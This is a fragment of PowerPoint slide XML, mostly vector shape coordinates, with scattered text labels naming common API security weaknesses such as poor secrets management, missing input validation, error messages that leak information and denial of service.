                <a:lnTo>
                  <a:pt x="770509" y="237337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731901" y="262051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694055" y="287794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656971" y="314566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620674" y="342328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585190" y="371081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550545" y="400786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516763" y="431431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="499325" y="448144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348107" y="289306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="533400" y="105156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="105156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="635254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188595" y="449453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="348056" y="614819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305816" y="670496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279577" y="707923"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254381" y="746086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230251" y="784999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207187" y="824623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185229" y="864946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164388" y="905941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144678" y="947585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126136" y="989863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108775" y="1032751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92621" y="1076248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77673" y="1120305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63969" y="1164907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51536" y="1210056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40386" y="1255712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30530" y="1301851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21996" y="1348473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14808" y="1395539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8991" y="1443037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4546" y="1490954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1524" y="1539240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289814" y="1539240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293293" y="1490700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298526" y="1442656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305460" y="1395133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314071" y="1348155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324332" y="1301775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336194" y="1256004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349643" y="1210881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364642" y="1166444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381152" y="1122705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399161" y="1079703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418617" y="1037488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="439496" y="996061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461759" y="955471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485394" y="915733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="510349" y="876896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536600" y="838987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="564121" y="802030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592886" y="766064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="622833" y="731113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653961" y="697204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686231" y="664375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719607" y="632663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="754049" y="602081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789546" y="572681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826046" y="544474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="863536" y="517512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901979" y="491794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="941324" y="467385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="981570" y="444296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1022667" y="422567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064590" y="402221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1107300" y="383298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150772" y="365823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194968" y="349834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1239862" y="335343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1285430" y="322402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331620" y="311023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1378419" y="301256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1425790" y="293116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473708" y="286639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1473708" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E3B3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304276" y="3907535"/>
            <a:ext cx="1454150" cy="1537970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1454150" h="1537970">
                <a:moveTo>
                  <a:pt x="1453896" y="106680"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="919480" y="106680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108456" y="292735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="950417" y="443153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891641" y="389509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856297" y="359752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="820115" y="330987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="783094" y="303225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745274" y="276491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706678" y="250812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="667321" y="226199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="627214" y="202692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586397" y="180289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="544880" y="159016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502678" y="138912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459828" y="119976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416344" y="102235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372249" y="85725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327558" y="70446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282308" y="56426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236499" y="43700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190169" y="32270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143332" y="22161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96012" y="13398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48221" y="6007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="286766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48374" y="294144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96189" y="303212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143383" y="313931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189953" y="326275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235839" y="340233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281025" y="355739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325475" y="372783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="369138" y="391325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="412013" y="411340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="454050" y="432790"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495223" y="455650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="535482" y="479882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574814" y="505460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613181" y="532345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="650544" y="560501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686879" y="589915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722147" y="620547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756310" y="652348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789355" y="685317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="821232" y="719404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="851916" y="754570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881367" y="790803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="909561" y="828052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936472" y="866305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962037" y="905522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986256" y="945654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1009078" y="986701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1030478" y="1028598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050429" y="1071346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1068882" y="1114894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085811" y="1159205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101191" y="1204264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114983" y="1250035"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127150" y="1296466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137666" y="1343558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1146492" y="1391259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153604" y="1439545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1158976" y="1488376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162558" y="1537716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1450848" y="1537716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447863" y="1488897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1443443" y="1440472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1437601" y="1392453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1430362" y="1344879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1421739" y="1297762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411757" y="1251127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400441" y="1205001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387805" y="1159395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373873" y="1114323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358671" y="1069822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1342224" y="1025918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324533" y="982611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305648" y="939927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1285557" y="897902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1264310" y="856538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1241920" y="815873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1218412" y="775919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193787" y="736701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1168082" y="698233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1141323" y="660552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1113523" y="623658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101039" y="608037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1266571" y="451485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453896" y="637413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1453896" y="10668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304276" y="5757671"/>
            <a:ext cx="1455420" cy="1346200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1455420" h="1346200">
                <a:moveTo>
                  <a:pt x="1455420" y="815213"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1264539" y="1004570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054823" y="785939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1069936" y="768565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099832" y="732155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128687" y="694867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1156462" y="656755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183157" y="617829"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208735" y="578104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233170" y="537603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1256449" y="496366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1278547" y="454406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1299451" y="411734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319110" y="368401"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1337525" y="324396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1354670" y="279768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1370507" y="234530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1385036" y="188709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1398219" y="142316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1410042" y="95389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420482" y="47942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1429512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137412" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1126782" y="46901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114526" y="93154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100645" y="138747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085189" y="183629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1068197" y="227787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1049680" y="271170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1029690" y="313766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008240" y="355523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985380" y="396417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="961136" y="436422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="935532" y="475500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908621" y="513613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="880414" y="550748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850950" y="586841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="820267" y="621893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="788403" y="655840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755370" y="688682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721220" y="720356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685977" y="750862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649668" y="780135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="612343" y="808164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574014" y="834910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534720" y="860336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494499" y="884415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453390" y="907122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411403" y="928420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368592" y="948270"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324980" y="966635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280593" y="983500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235470" y="998816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189649" y="1012571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143167" y="1024712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96037" y="1035215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48298" y="1044054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1051179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1338072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49110" y="1332090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97764" y="1324648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145935" y="1315783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193611" y="1305496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240766" y="1293825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287375" y="1280782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333425" y="1266393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378866" y="1250696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423710" y="1233703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467906" y="1215428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511441" y="1195908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="554304" y="1175156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596455" y="1153198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637882" y="1130058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678548" y="1105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718451" y="1080338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757555" y="1053795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="795845" y="1026160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="833285" y="997445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869873" y="967701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896658" y="944600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106424" y="1161542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920623" y="1345692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455420" y="1345692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455420" y="815213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98336" y="5757671"/>
            <a:ext cx="1472565" cy="1353820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1472565" h="1353820">
                <a:moveTo>
                  <a:pt x="1472184" y="1054735"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1423047" y="1048080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374482" y="1039685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1326527" y="1029563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1279220" y="1017765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1232573" y="1004316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1186637" y="989253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1141450" y="972604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1097038" y="954405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1053426" y="934694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010666" y="913511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="968781" y="890866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927798" y="866813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887755" y="841387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848702" y="814603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810653" y="786498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="773645" y="757123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737717" y="726503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="702894" y="694664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="669213" y="661644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636727" y="627468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="605434" y="592188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575398" y="555828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546633" y="518426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519188" y="479996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493077" y="440601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468350" y="400240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445046" y="358978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423176" y="316839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402793" y="273850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383921" y="230047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366585" y="185470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="350850" y="140131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336715" y="94094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324231" y="47371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313436" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21336" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30149" y="47371"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40347" y="94259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51904" y="140627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64795" y="186461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78994" y="231749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94488" y="276453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111239" y="320560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129247" y="364045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148463" y="406895"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168897" y="449072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190500" y="490575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213271" y="531368"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237172" y="571423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262204" y="610743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288315" y="649287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="315493" y="687031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343738" y="723976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372999" y="760069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403263" y="795312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406793" y="799211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185547" y="1006983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="822706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1353312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="534416" y="1353312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345440" y="1163955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="566102" y="955421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604799" y="987539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="641502" y="1016177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="679043" y="1043774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="717384" y="1070317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756526" y="1095794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="796429" y="1120178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837069" y="1143431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878446" y="1165555"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="920521" y="1186510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963269" y="1206296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006678" y="1224864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1050721" y="1242212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1095387" y="1258316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1140637" y="1273136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1186459" y="1286687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1232839" y="1298905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1279740" y="1309801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1327137" y="1319339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375029" y="1327505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1423390" y="1334262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1472184" y="1339596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1472184" y="1054735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806444" y="3695141"/>
            <a:ext cx="2376805" cy="6978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effectiv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secrets</a:t>
            </a:r>
            <a:endParaRPr sz="2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management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034396" y="3695141"/>
            <a:ext cx="1695450" cy="6978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Lac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k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p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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pP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validation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60991" y="6765163"/>
            <a:ext cx="2565400" cy="69723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 indent="261620">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Error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messages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leaking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fo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mati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19854" y="6909054"/>
            <a:ext cx="216916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Den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ser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v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ice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84375" y="1882292"/>
            <a:ext cx="12283440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38575" marR="5080" indent="-3825875">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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If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API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isn't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secure,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attackers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easily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take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advantage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compromise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services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and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stored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web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application.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98868" y="4662627"/>
            <a:ext cx="1871980" cy="17005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99900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Common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Weaknesses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and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Vulnerabilities </a:t>
            </a:r>
